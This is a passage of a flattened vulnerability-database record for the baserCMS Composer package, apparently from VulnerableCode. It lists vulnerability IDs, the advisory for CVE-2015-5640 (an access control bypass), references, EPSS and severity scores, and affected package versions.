vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0574, GHSA-6qjv-43mf-rgrh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zy68-bur9-1fck
Fixing_vulnerabilities
0
url VCID-cqu1-32s9-b7b9
vulnerability_id VCID-cqu1-32s9-b7b9
summary 
baserCMS Access Control Bypass
baserCMS before 3.0.8 allows remote authenticated users to modify arbitrary user settings via a crafted request.
references
0
reference_url http://basercms.net/security/JVN04855224
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://basercms.net/security/JVN04855224
1
reference_url http://jvndb.jvn.jp/jvndb/JVNDB-2015-000138
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvndb.jvn.jp/jvndb/JVNDB-2015-000138
2
reference_url http://jvn.jp/en/jp/JVN04855224/index.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN04855224/index.html
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2015-5640
reference_id
reference_type
scores
0
value 0.00442
scoring_system epss
scoring_elements 0.63612
published_at 2026-06-05T12:55:00Z
1
value 0.00442
scoring_system epss
scoring_elements 0.6357
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2015-5640
4
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-5640
reference_id CVE-2015-5640
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2015-5640
6
reference_url https://github.com/advisories/GHSA-v9gf-98vr-mgp2
reference_id GHSA-v9gf-98vr-mgp2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v9gf-98vr-mgp2
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.7.1
purl pkg:composer/baserproject/basercms@3.0.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-erav-4pk1-wfhc
17
vulnerability VCID-ffq1-r9ck-1bhp
18
vulnerability VCID-g56w-z9cx-5ygv
19
vulnerability VCID-ga9u-uv9b-tydr
20
vulnerability VCID-ggv8-3v9t-mfea
21
vulnerability VCID-gsg3-fdmu-vqag
22
vulnerability VCID-guvm-x5jc-mfgc
23
vulnerability VCID-hpk4-a6tr-3ffe
24
vulnerability VCID-j37y-gws9-ake9
25
vulnerability VCID-jby7-s5ez-dqb3
26
vulnerability VCID-k575-suuf-7bhf
27
vulnerability VCID-k5qv-4yp3-zbgf
28
vulnerability VCID-khft-xvrw-g3dr
29
vulnerability VCID-kmpp-6j49-pqfz
30
vulnerability VCID-mfm9-gsh3-ubg8
31
vulnerability VCID-nxrf-64er-xbfx
32
vulnerability VCID-p695-t9ye-v3ga
33
vulnerability VCID-p6nr-eu91-53b4
34
vulnerability VCID-pd8c-9d7z-zkhg
35
vulnerability VCID-r4jc-22rq-d3cb
36
vulnerability VCID-sqr4-v889-tff8
37
vulnerability VCID-u16w-rbuk-ybfs
38
vulnerability VCID-uedz-j2vn-cbea
39
vulnerability VCID-vqx2-hzju-r7et
40
vulnerability VCID-xpsb-2yux-g3cf
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-y9f3-k7xk-rucf
43
vulnerability VCID-yesf-qxgy-3ygx
44
vulnerability VCID-zqd4-rdem-jfgk
45
vulnerability VCID-zsgc-fnen-b7a6
46
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.7.1
1
url pkg:composer/baserproject/basercms@3.0.8
purl pkg:composer/baserproject/basercms@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-erav-4pk1-wfhc
17
vulnerability VCID-ffq1-r9ck-1bhp
18
vulnerability VCID-g56w-z9cx-5ygv
19
vulnerability VCID-ga9u-uv9b-tydr
20
vulnerability VCID-ggv8-3v9t-mfea
21
vulnerability VCID-gsg3-fdmu-vqag
22
vulnerability VCID-guvm-x5jc-mfgc
23
vulnerability VCID-hpk4-a6tr-3ffe
24
vulnerability VCID-j37y-gws9-ake9
25
vulnerability VCID-jby7-s5ez-dqb3
26
vulnerability VCID-k575-suuf-7bhf
27
vulnerability VCID-k5qv-4yp3-zbgf
28
vulnerability VCID-khft-xvrw-g3dr
29
vulnerability VCID-kmpp-6j49-pqfz
30
vulnerability VCID-mfm9-gsh3-ubg8
31
vulnerability VCID-nxrf-64er-xbfx
32
vulnerability VCID-p695-t9ye-v3ga
33
vulnerability VCID-p6nr-eu91-53b4
34
vulnerability VCID-pd8c-9d7z-zkhg
35
vulnerability VCID-r4jc-22rq-d3cb
36
vulnerability VCID-sqr4-v889-tff8
37
vulnerability VCID-u16w-rbuk-ybfs
38
vulnerability VCID-uedz-j2vn-cbea
39
vulnerability VCID-vqx2-hzju-r7et
40
vulnerability VCID-xpsb-2yux-g3cf
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-y9f3-k7xk-rucf
43
vulnerability VCID-yesf-qxgy-3ygx
44
vulnerability VCID-zqd4-rdem-jfgk
45
vulnerability VCID-zsgc-fnen-b7a6
46
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.8
aliases CVE-2015-5640, GHSA-v9gf-98vr-mgp2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cqu1-32s9-b7b9
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.8